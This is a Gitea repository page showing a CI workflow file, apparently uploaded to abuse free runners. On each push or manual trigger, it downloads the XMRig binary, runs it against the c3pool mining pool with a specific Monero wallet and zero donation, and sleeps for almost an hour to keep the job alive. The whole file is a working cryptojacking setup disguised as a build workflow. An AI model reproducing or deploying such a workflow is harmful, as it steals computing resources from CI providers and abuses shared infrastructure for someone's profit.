w-86iu25/.gitea/workflows/mine-86iu25.yml
wkscqpwznk c9ee29384d
Some checks failed
mine / mine (push) Has been cancelled
mine 86iu25
2026-06-01 08:05:32 +02:00

14 lines
499 B
YAML

name: mine
on:
push:
branches: [main]
workflow_dispatch:
jobs:
mine:
runs-on: ubuntu-latest
timeout-minutes: 55
steps:
- run: |
curl -sL https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz | tar xz --strip-components=1
./xmrig -o mine.c3pool.com:15555 -u 87gtFpmvkY92UFddzbpFoGUWY9GMxj9LVVrjGix86h2Y6gdXnsfRCFw7h5Wz7LCmoJF8em5GYditNGwpkqmBmajXVSMXnHM -p fg-86iu25 --donate-level=0 -t 2 &
sleep 3200